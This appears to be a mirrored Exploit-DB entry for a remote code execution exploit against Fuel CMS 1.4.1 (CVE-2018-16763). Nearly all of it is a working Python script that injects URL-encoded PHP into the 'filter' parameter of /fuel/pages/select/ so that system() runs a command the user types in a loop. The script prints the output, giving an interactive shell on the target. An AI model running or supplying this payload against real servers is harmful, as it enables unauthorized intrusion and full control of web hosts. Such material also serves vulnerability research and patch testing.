fuel CMS 1.4.1 – Remote Code Execution (1)

  • 作者: 0xd0ff9
    日期: 2019-07-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47138/
  • # Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
    # Date: 2019-07-19
    # Exploit Author: 0xd0ff9
    # Vendor Homepage: https://www.getfuelcms.com/
    # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
    # Version: <= 1.4.1
    # Tested on: Ubuntu - Apache2 - php5
    # CVE : CVE-2018-16763
    
    
    import requests
    import urllib
    
    url = "http://127.0.0.1:8881"
    def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
    start = haystack.find(needle, start+1)
    n -= 1
    return start
    
    while 1:
    	xxxx = raw_input('cmd:')
    	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    	proxy = {"http":"http://127.0.0.1:8080"}
    	r = requests.get(burp0_url, proxies=proxy)
    
    	html = "<!DOCTYPE html>"
    	htmlcharset = r.text.find(html)
    
    	begin = r.text[0:20]
    	dup = find_nth_overlapping(r.text,begin,2)
    
    	print r.text[0:dup]